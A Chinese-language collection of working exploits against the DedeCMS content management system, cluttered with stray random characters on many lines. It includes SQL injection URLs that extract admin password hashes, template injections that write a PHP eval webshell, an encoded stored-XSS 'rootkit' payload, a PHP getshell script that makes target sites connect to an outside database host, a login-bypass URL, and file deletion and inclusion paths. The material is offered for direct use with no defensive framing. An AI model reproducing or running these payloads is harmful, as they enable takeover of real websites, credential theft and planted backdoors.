|
|
' R7 p7 V" g# R8 T a6 A
Dedecms 5.6 rss注入漏洞
2 s+ d" k' K) E! Z+ ghttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
! n$ j+ C0 [# J9 n) v1 d: Q9 K5 Z" J* m
, d/ f5 L( L) b t- u
6 d; W4 Y4 q, m1 k" o
- F# L+ I. g( T% m s. x. M4 r' x4 w9 L0 X' G) p' r! A9 }5 o
( c9 U; Z, a3 _$ F% T& B
. K: b4 r- f! h/ V( t
( X% u ?/ w: G; Q! P+ ?, {# T) Z H! ~DedeCms v5.6 嵌入恶意代码执行漏洞
6 E7 q: w# w7 F注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
2 @+ D# P: Q. b' j发表后查看或修改即可执行
6 q$ q# Y( D- G+ t! \a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}& L- W9 |+ [( q# H( U* o
生成x.php 密码xiao,直接生成一句话。; y5 L. y2 L% q0 g/ p! g4 O
! h9 g7 e: D7 E: ]( m) ?: y
3 q4 A I# v! M0 {) K. u8 x7 v3 u& T, T7 d+ T
0 z$ B& Y1 |. C5 x4 Z. `# W1 W" P$ T& ]
8 U/ C+ U% v7 `% J
3 ^. ^! A. T) b2 R3 u
1 e- {) b& d |- I+ B/ C
8 \* A% O7 S8 E2 dDede 5.6 GBK SQL注入漏洞
. \" _3 i# n5 G" Q) hhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''; M7 Q0 C" c( B w, W, S
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe* }6 O b0 ?/ R
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
7 M# ~4 y. i8 Q- J* U
% }" a7 U( ?9 c# @0 Y/ a j7 u7 H# @1 v; u! `2 f4 ^
9 H; c- F6 u$ {" F0 ]
4 P* D* {1 i# `) n3 t0 ?
) K5 M. B8 d$ N$ N$ O f: Z5 U! w+ j" R" `0 h: @/ ~* r
" v& d& y1 v2 J$ A) ~5 D9 z
6 m% J3 x. Y8 T1 J9 YDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
; N. [( I. k) D; A9 ^, lhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
) K/ z* H3 ? y9 A6 B: Y3 ?! ]4 v% @! | ]3 I
. n" h8 L6 @% p2 e8 H/ p" c
0 c+ L* O+ Q9 o" w* x5 S2 v2 q
# ^8 @& `1 z4 e, A( W) V# ^: W( O ` _0 C
/ w" W- [+ |( q
DEDECMS 全版本 gotopage变量XSS漏洞
6 m; Z7 }5 i3 @/ Q0 z6 @1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
6 |$ n6 |. q, Dhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="8 G5 M) l/ O7 t' \% y
# y; e0 |/ V8 H
' k: J1 E: ~1 B2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 + i6 r3 o0 V/ V5 v
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
4 g2 ~8 S+ Y! G+ C
9 `: l( D) n5 N4 B" ^8 D9 o& X
http://v57.demo.dedecms.com/dede/login.php/ K6 c+ ]1 a' r* ~4 D) `" |! N6 J5 F
7 f- n! I* V" B
( E/ t% c7 E0 U. E& D/ ncolor=Red]DeDeCMS(织梦)变量覆盖getshell
: | p5 p! v8 @: F- [#!usr/bin/php -w% c% v5 r% i3 ~; }! }. F, l
<?php5 j/ j/ ?9 \: a! ]
error_reporting(E_ERROR);2 O' }9 k* ]) [% ^5 n2 U0 Q
set_time_limit(0);% \) I- Z/ y9 A* h& ]# h- i
print_r('
5 P0 v1 F. G* e& P$ ?DEDEcms Variable Coverage
' X' Z w6 O/ M& K4 a( C: ~: fExploit Author: www.heixiaozi.comwww.webvul.com
0 U4 ^5 J6 ~" W' q1 _, Y);
" r& U7 f6 }& Z# X1 ^echo "\r\n";6 ^1 ]5 w; R% b# f9 l
if($argv[2]==null){
8 B4 X0 N; K. y/ [6 yprint_r('* M3 L! ]" P! Z4 i4 G2 }
+---------------------------------------------------------------------------+* [9 T" x% ~( T9 Q
Usage: php '.$argv[0].' url aid path
- |, g/ \, \" A9 D3 _$ iaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/% e* X3 a. Z8 I& h6 e, a
Example:% z% M, F* E2 h$ T) a0 g Y
php '.$argv[0].' www.site.com 1 old
/ a3 D9 a' W/ x6 _8 `( [+---------------------------------------------------------------------------+! m7 S$ T! \7 B. G& N$ d7 G
');
6 s* [ t, r6 |exit;
8 M5 A+ o5 S5 V( \2 O) N}! c" B7 Y6 ^& b* S
$url=$argv[1];; Y' J7 ]3 w- r- z8 P+ r
$aid=$argv[2];
$ ?+ d- p- [' U3 i/ e% b4 z) z$path=$argv[3];
A2 O+ ]+ U8 I$exp=Getshell($url,$aid,$path);; t% W* s1 j$ Z4 ]
if (strpos($exp,"OK")>12){
' y' W* X1 b- F7 hecho "
p! m5 ~+ V' uExploit Success \n";9 b3 l+ y+ u5 b
if($aid==1)echo "
r1 g# ^( m) RShell:".$url."/$path/data/cache/fuck.php\n" ;- x4 _" K& y0 I9 n
' X" E, _ `5 h7 J% x4 z$ g
3 s( h1 N. `+ cif($aid==2)echo "
) u1 o* H) Y( O! ?7 xShell:".$url."/$path/fuck.php\n" ; b$ r- X! h) B
T" n. u' B$ O5 h6 M$ z: J% M; M! J2 `
! q' W( g B( m8 ^6 ?/ t) ^if($aid==3)echo "0 a. a3 s4 O7 ?& x+ g7 m( E4 S
Shell:".$url."/$path/plus/fuck.php\n";( K- ^" s# K: c D; {
" p, H# D( t* C: T, g$ _9 m$ D
) y+ ~4 m7 x4 x4 Y
}else{+ l* d1 y7 o$ O6 M( s
echo "
4 n) e3 Q" P/ T. v8 D; y0 g/ m5 VExploit Failed \n";
7 R% b" Z" Z* S( z+ s}' M* ]0 h) k' u9 G7 R- j( N& n8 Q; X
function Getshell($url,$aid,$path){/ B7 y) I5 A' R) Y1 I5 M
$id=$aid;
% @ }1 C* {+ Q8 ^$host=$url;# D5 @" D, z! R* t( i
$port="80";; U8 i# C) E" U: j7 ?
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
% ]. P! V: ?8 F: R Q1 u$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
5 _) d" L) ]0 B$data .= "Host: ".$host."\r\n";; D4 j- S L9 F
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$ d5 F; a" {/ h
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
5 }1 w1 z. G1 g( N$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";8 w/ T: {( p+ D- _4 H/ A
//$data .= "Accept-Encoding: gzip,deflate\r\n";
( S8 c' J0 A4 v$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";5 @4 ~$ K2 @, i$ N$ W
$data .= "Connection: keep-alive\r\n";% W/ Y# Y7 [9 J& l) Y
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";: [+ f" c+ t3 D0 C! Q2 F
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
# t8 n! G: g4 E6 J$data .= $content."\r\n";5 y: G' k7 \/ ]" k+ v, k6 m4 o& |: p8 s
$ock=fsockopen($host,$port);* G' ?/ @+ s8 Z9 S$ h8 y
if (!$ock) { h4 H8 B1 i8 Z& p, a. F( ?3 Z
echo "; L$ b+ M- Q1 ^# n/ n3 j
No response from ".$host."\n";
0 L) y: \- X* |0 S, }}
* y# X: n! ^ Q7 V$ ]+ ]# K# lfwrite($ock,$data);
: r. A5 h; J% O' F _while (!feof($ock)) {
; l3 ]6 a* k" f0 |7 `2 k& g$exp=fgets($ock, 1024);
2 }5 s& j7 j/ ~) j, {( xreturn $exp;; e2 d) K0 ]/ f7 X4 X
}
: S) p7 C n9 v( |}
8 s" B2 y" y+ `* C2 W1 J0 ?) |
2 c- K* f& D# ?! Q5 M0 @0 W* q* K$ P6 M8 c4 x1 g `
?>0 B/ V& B9 U) x' @' z9 k
5 `* ?' W1 D0 ?8 x* X' j
' G/ z% A! g7 H, e) D Q
5 z: y! E. ^- J% o% e
& V" @# C4 I6 w8 t' x& f( N% n8 W8 L9 m
+ q' c: O* V1 S7 s
+ m5 ]7 L1 t( G5 Z
6 E" z9 K6 }/ p1 ^- L. l' h
% W% B0 U' w! `/ l" ^- r, f& f4 ^6 I& ^
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
: n! g8 T0 t$ Y5 Ohttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. x6 m, X6 z! \* A# W# J
# z1 i( U& W6 k, [
% ?" S+ x$ c+ `( i
把上面validate=dcug改为当前的验证码,即可直接进入网站后台3 r/ Y3 a* c* y: h, K' o
% z( b- P1 p+ T! ?1 S4 c
, b' ~" Z4 q2 ?+ l$ G% l9 u此漏洞的前提是必须得到后台路径才能实现
& D! E" I; d5 o2 h( M0 r: F. q' Q* X
8 a* ?/ ]3 } G b. r+ n& h
% ~) d/ S$ X; n* P, |" n1 s
$ X( M$ K" I5 N# T7 |% V; G( Q# O
$ p% x) K; W2 @$ U/ y
! j/ _, N/ L/ p6 ^# {3 `7 ]( U
' b2 E6 q' T" x( O) k
% H0 a1 b3 P2 [1 a. P
5 o B D3 `4 |" vDedecms织梦 标签远程文件写入漏洞
( D- B2 W& z# Q+ E# Q2 p3 R: s前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
7 r8 B7 p: |! l0 i
0 q/ E% G/ N, J+ W
8 s* h5 s+ L5 x6 p) a再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 ! e7 E3 T6 f( k# |( c/ {7 L
<form action="" method="post" name="QuickSearch" id="QuickSearch">
' V& g. G& a- x ~! d. z, P$ n# V<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />; H& a/ N( t6 ?" n) O) o
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
# m6 Q& D: G# _: h<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />+ {1 R3 ]3 i2 J& N
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />9 j( N% @: k' @2 j( o
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />; J* V3 N, y' u/ _8 `
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
, q/ m' {' z( b9 m<input type="text" value="true" name="nocache" style="width:400">7 L" {0 Y6 d# U( r7 i% c
<input type="submit" value="提交" name="QuickSearchBtn"><br />
6 _7 Z3 j% b1 G</form>
' e! F( ]; ^% l" Y<script>; g3 e( S. {8 j' x {" u
function addaction()0 p: P! V, L6 D$ ]) p
{4 g, x6 e5 g# O- F; J" `
document.QuickSearch.action=document.QuickSearch.doaction.value;
# r0 F0 T3 ^* h$ U( Q) h}
3 V$ n6 k) m. `% ]- g/ V. C. ^2 O</script># P6 s: T9 O; A: Y8 C( v
% S# [: e! y: p9 a ^
% J) O* E) ~ c$ A
. `+ m$ `3 [* v+ E7 q6 V
- h# A0 _) X( f Z* o- b) a U6 K2 C4 r7 O* n4 H
+ C5 O9 O' L2 V8 M3 E9 J
( v: I% X, m \" q0 _1 d. X+ E, E0 L0 B8 y6 g
% W5 Y" z w: J* ^9 v6 n r: E# q4 }: A) s
DedeCms v5.6 嵌入恶意代码执行漏洞6 V) Z# c+ Z0 {9 z& r$ p- b
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
* T1 i* U8 E2 {1 ~3 Ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}1 g S! K$ p& R) e! Q/ S4 ]& `3 d1 y
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
( V4 M( ~0 b7 X( PDedecms <= V5.6 Final模板执行漏洞4 N9 U s: ^0 K0 o0 P, |( l. A- z
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:: n& W3 }+ l5 D- N9 @( `
uploads/userup/2/12OMX04-15A.jpg
! B8 W0 X* J+ K) W
( u. o+ L7 ^8 b: b8 h
/ \! r X! Q# [' ~$ T- m模板内容是(如果限制图片格式,加gif89a):( Y, c( `: ]" A
{dede:name runphp='yes'}
( |3 Q! J: J% v; A* J3 Y* N$fp = @fopen("1.php", 'a');7 d% p, s0 N5 C3 e
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");- m( p* K, d; }) \5 e2 g8 X
@fclose($fp);; ^) \& x) [4 R
{/dede:name}" {: H0 E/ k" R1 ^) l) @5 B
2 修改刚刚发表的文章,查看源文件,构造一个表单:. e( e0 D7 |: c# B: y
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">: N" y( o4 e: \7 q% @: C9 G* G
<input type="hidden" name="dopost" value="save" />) Y9 o E! ]7 \6 D2 o
<input type="hidden" name="aid" value="2" />
! \8 d1 g7 ]% Z<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" /> I$ K; n2 l& x% r9 ?3 E2 R
<input type="hidden" name="channelid" value="1" />; b! ~, ]3 q6 D. [. ~9 h, }* [
<input type="hidden" name="oldlitpic" value="" />
% T9 a5 @5 z5 t. R3 m3 _1 p y% }/ R<input type="hidden" name="sortrank" value="1275972263" />' {5 a7 r+ p9 \% [- W0 ]" [* r
8 k s9 U1 ~% R( v" N0 p
( m7 Y! i) f+ z' z: H<div id="mainCp">
* E( C. m! z \, P! b<h3 class="meTitle"><strong>修改文章</strong></h3>
3 e9 v( A2 Q: ] c2 Y
1 a+ Z2 a. z+ @6 Z$ M1 [( c" I+ \; j
<div class="postForm">
* O* A. {5 P2 x3 @) v<label>标题:</label>
4 s2 S/ w. E. d9 X<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>1 O% P* _7 @# T+ p
. X+ R6 s% x) @ [5 Q
" {! D+ R! [) M. y<label>标签TAG:</label>* g4 f' a" P8 v4 ^3 Q+ m0 d
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)1 ^( T% c3 B2 ?9 k4 a) C* |
% t7 W3 b" M) V+ a0 O6 A
# M- f7 \1 \: Z9 A) i<label>作者:</label>" W ?2 d( R9 i3 C& u7 b
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
# G9 j& N' }0 [$ y: [! z% a. X A/ k& {* u- _* Q% w( _' }- m8 r8 @
, W% C4 Q* o8 `9 t( [<label>隶属栏目:</label>
/ V% \+ {& _ ]; _5 L7 t: a5 L<select name='typeid' size='1'>0 z$ r" s; B2 O2 R
<option value='1' class='option3' selected=''>测试栏目</option>
3 A5 O! t- U0 ?8 ?</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)# K; c* d9 ~* P! q* d
( M \9 C7 v# _, a8 i \3 l9 s
7 A4 k- G- Q( z, x: ~* V
<label>我的分类:</label>
0 q$ E# o0 U: f<select name='mtypesid' size='1'>' R ]" U+ C4 v4 W: E
<option value='0' selected>请选择分类...</option>
5 N' ], m& h$ R3 Z<option value='1' class='option3' selected>hahahha</option>( U8 ~% b; S) y$ ~ F. |5 I
</select>: M% {, @, L" m3 \! }, V9 N
( S) D" j3 P n! u) x3 O7 T
. i& |$ W4 G8 X w2 r: e: @<label>信息摘要:</label>0 a5 I8 B) C1 f2 C) U
<textarea name="description" id="description">1111111</textarea>0 o: @: u" c. A( E8 r6 p. W
(内容的简要说明)
* c4 G: k$ z1 \ c# S: \2 q. _" [. Z( m5 C! c' F
]" V! [8 Z* G<label>缩略图:</label># Q" }- F* C0 r& r
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
: `) F: p f9 M- E& r4 ]' V. S# K4 _* P+ _
# K4 F$ b" P3 h6 E1 X<input type='text' name='templet'" [# v: ?- Z+ h; c9 A
value="../ uploads/userup/2/12OMX04-15A.jpg">' q) }+ i1 o3 q6 L7 N
<input type='text' name='dede_addonfields'; C4 D5 ]) C$ A
value="templet,htmltext;">(这里构造)
0 T* M7 m9 a1 K9 @( i5 P</div>
& [% V6 `* {5 V- J; F# G, [. N. N5 x4 ~" s! v: |, Q: N# Q
+ g: y; ^: ^" T8 r* n' z<!-- 表单操作区域 -->
, ~0 g5 O+ Q7 o) q" g; Q* R4 X I<h3 class="meTitle">详细内容</h3>
1 x8 G, Q8 G. I* \) s$ W/ v6 L9 T
, |- r; d$ a6 X) d2 P$ P! v5 Z$ @
- I3 K$ T% g a& @* |" g( O<div class="contentShow postForm">0 Q# m a9 ?% I
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>5 @7 e( ~' H" P% Y! R- G
/ O2 F' V$ G6 M y' \ M d5 T' i8 [4 R% C q# q; g# p; ]) S
<label>验证码:</label>
* W. N$ _ Y8 D, f<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
4 E% ]7 L! o1 |( i<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />/ v( y! {8 u8 S ]% b
$ Z X5 n- n: y* i% [/ X: m8 M
- r7 i- v4 i1 q6 Z5 m<button class="button2" type="submit">提交</button>0 D+ J' [9 |2 Q8 m3 c* G" ^
<button class="button2 ml10" type="reset">重置</button>7 y0 G1 T; Q' |. }6 H% g
</div>3 S8 l% D+ V7 R& @
* Q ]2 }, D. P- ]" `1 r* c6 V; |% ?6 Y! f8 h6 `3 M; c( Q
</div>
4 g) J6 l* e2 r7 ]. {2 K; u$ s. y" V2 }( J
; L& ]5 e( b( e* r' [
</form>: A4 n( A- |/ \! E: |0 x
' C4 h, x, g" f3 [
" O3 h: {% J: d) [: V( l2 s5 |提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
' |2 r# j; b9 S* M. x* P假设刚刚修改的文章的aid为2,则我们只需要访问:
0 D9 Z6 e3 Y" a1 ohttp://127.0.0.1/dede/plus/view.php?aid=2
V# ^; {& ?2 Q: D即可以在plus目录下生成webshell:1.php
! Z( b+ R$ p. t0 J% g
9 A6 [4 [$ H l: o" A# o( q
0 q- B- q2 g. J) j, `' D1 E9 |4 j
+ j2 t# S! v/ w0 J' X8 l6 c4 o
3 |7 X# Q& V3 U" G" {* h1 |; f$ {+ s9 H6 @
5 r" G" i6 l1 B" ]" d# h% ^/ Y7 I: Z! l( p9 J# t( f+ \
9 H6 ^6 H# Z2 h9 G. b) t" \ F8 ^
5 h& \3 R( e3 ]& L& G7 a8 m; x0 j; e+ v6 Q- |5 A- G
2 F8 C3 s* {8 _% J: c
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
5 j/ H2 d& X, `/ H" ^Gif89a{dede:field name='toby57' runphp='yes'}; ]2 J, u9 |$ T1 B
phpinfo();
: ~; F$ d3 J6 {' k! t{/dede:field}0 W( A5 }9 D4 U9 S& ]
保存为1.gif$ C$ o' [- w) o
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
0 `2 U) K, x$ {4 Q" P* D, M! E& b<input type="hidden" name="aid" value="7" /> 8 Z: d% u/ U- [5 n2 y1 l
<input type="hidden" name="mediatype" value="1" /> 6 K9 M/ X( D9 |/ V3 Y: l7 b0 ^4 L
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> / H0 B1 y! @6 x
<input type="hidden" name="dopost" value="save" />
8 {8 ~" r1 ~4 M: R( J9 C<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 0 K' M: P5 J. J, o/ ~
<input name="addonfile" type="file" id="addonfile"/>
9 |3 w5 V4 ]* X0 f<button class="button2" type="submit" >更改</button>
- [8 f) [1 S+ {$ k) @, A</form> , d- a$ K& P) b. J( @
9 U- A5 Q' p* \0 H
7 D+ {5 f" f& U" P* ^2 ~9 s: C
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif3 @; j$ ^; D0 _, Q' s4 n* @
发表文章,然后构造修改表单如下:. B9 W; G% p1 L9 G& b8 M, M
" s# @8 ~+ {# H8 W3 x& @" w
9 R0 e8 |" ?9 A
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 r, I0 ~& {! b: a9 F, v; _<input type="hidden" name="dopost" value="save" />
/ X- ~1 }, _: u( G1 a<input type="hidden" name="aid" value="2" />
2 a) @: i- C# a5 V; z<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> + x v9 g# o* d% {0 {- O
<input type="hidden" name="channelid" value="1" /> * a" }# d7 K3 H
<input type="hidden" name="oldlitpic" value="" />
/ z7 {' P9 Y# I6 G: N# e<input type="hidden" name="sortrank" value="1282049150" />
: h! }: k P+ R' r9 ^& k0 e$ u5 w v<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 2 _5 Y; u0 o- ~. k/ A% C
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
. G$ N, f3 i: O% \* K9 G<select name='typeid' size='1'>
; ]- x4 r C; R<option value='1' class='option3' selected=''>Test</option>
9 ?" @- M- ~2 R/ u6 r% Q% ]<select name='mtypesid' size='1'>
0 X. N. \$ g( b, `, r4 s& i<option value='0' selected>请选择分类...</option>
7 H9 s# s+ C! \" K% s<option value='1' class='option3' selected>aa</option></select> ( h7 F3 r5 b0 x i
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> / p" D+ H# W9 G
<input type='hidden' name='dede_addonfields' value="templet"> ; g/ }8 o2 k7 Q+ i0 ^- `8 E3 ?. h2 C" Y
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
0 [& `3 E( n! W) s( ?+ _! G<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 1 [/ j( L. G3 T1 W9 M) z
<button class="button2" type="submit">提交</button>
4 g- k( c$ R: y. P4 {</form>
0 I0 N; I( e8 R1 @
. B/ s9 f% Z7 K: E9 b7 Y: P# E$ u4 W9 N
5 @: Z8 o: J$ r1 f, X
) M, K6 d* S3 l2 r# j
# t, O! L# }4 j, J4 Z4 `- t# j$ e0 u9 H
& L- L5 W: {9 t* G3 R( y# d
' w( I# H2 Y0 j# h% X, e" M4 T) y; V! W5 h+ E K8 e: |, T
" _$ Q+ \1 J' A9 }8 v0 o: S
( d' S$ D; \, m
$ L0 _ E3 @. n4 ^! Y" R
织梦(Dedecms)V5.6 远程文件删除漏洞
* e& e7 A" W1 ]. Y: ^http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif9 e6 u8 E/ v0 g9 L
' a2 d* ~& k8 |
* Q7 y! k* F, H: f$ S/ c' e" D
# ~/ e; G; a& H" ~0 C; ^3 D
1 s- b d% i' n: L& ^! b
) _. b! F2 b. C
$ k1 ?! G) Z e8 v6 ]& x; X0 L9 n4 U3 V5 g, d2 F. T9 [: \9 O' c
* ~# _* O% [* O/ u- z
4 o* p- [5 |( w) B3 H( g, c3 X8 ~# Y/ `9 T3 [! R% r5 j
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 " g9 F {2 O! Z4 x9 N! l {6 G
http://www.test.com/plus/carbuya ... urn&code=../../
; K" q- J1 I! v
7 v' A! W4 ^" x. X& {7 |, g+ W8 X9 K1 f
4 `$ p# q6 p; s9 G+ L% [! y! i
( N8 J. c: X# ? }1 a: c
- x% ?, U- m5 ]
5 [, v/ g& J, c. H2 [ Q: d1 `: f* k( u
7 r8 v/ e' p. X; m' I( X: W
' z, i, q$ l/ S
' I( t7 @9 y2 J0 M- m @DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 h2 z5 s& A, n; {4 R9 a% n0 \plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`& ^, v, b; V/ T
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
7 j2 @; f/ h x$ M) F
1 r" n" s8 f- }, B: @+ E; U( ^# {, h. E6 |* M7 N
1 Z2 }# D$ i; n
7 A" A8 w2 J5 ?, L9 B
, z9 r+ K* g5 w8 W+ N t
% H5 d, e3 {5 u- f( E2 _! M; \% S/ v1 I* P2 d
- z: G8 @7 B0 ]) p! ?2 g+ B! O" p, L0 |' B7 n. W: E
5 E& K1 D) v9 k6 m# ^$ T织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
8 i! G3 v5 t& P) D2 e, Shttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
/ o- R( W) W& M* ^! g, A
5 Q5 H) l& A1 \
+ F3 T- J+ f$ B+ ?( z; R5 ]- x8 q' [. y0 a; e6 a' N
2 }# Y! _7 p$ a. c4 b
: O% _. p- K9 Z2 w8 F( \# |% e4 Q, F) x j
' J7 e2 P3 y% H& r H1 M
/ u& ~ {! A7 w: {( Q7 m
4 T. I X/ n9 Q. a0 j( s
. w7 J9 g) F- c) f/ q9 {& l4 V织梦(Dedecms)select_soft_post.php页面变量未初始漏洞: E: R9 A8 [4 S
<html>
- g$ ]* N1 h! m9 B6 E/ P<head>" o4 K9 o2 P. h( N
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>7 Y8 e0 t5 e8 s6 n" y
</head>% B) h* T1 P8 J9 e( e
<body style="FONT-SIZE: 9pt">
6 i. I; C# ~5 D, i; `---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
